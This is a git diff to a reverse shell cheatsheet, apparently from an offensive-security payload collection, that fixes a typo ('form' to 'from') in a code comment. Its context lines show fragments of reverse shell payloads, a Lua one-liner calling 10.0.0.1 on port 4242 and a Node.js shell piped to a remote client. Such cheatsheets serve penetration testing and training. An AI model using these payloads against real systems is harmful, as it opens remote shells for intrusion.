diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md index e1da152..01355b3 100644 --- a/Methodology and Resources/Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Reverse Shell Cheatsheet.md @@ -343,7 +343,7 @@ lua5.1 -e 'local host, port = "10.0.0.1", 4242 local socket = require("socket") sh.stdout.pipe(client); sh.stderr.pipe(client); }); - return /a/; // Prevents the Node.js application form crashing + return /a/; // Prevents the Node.js application from crashing })();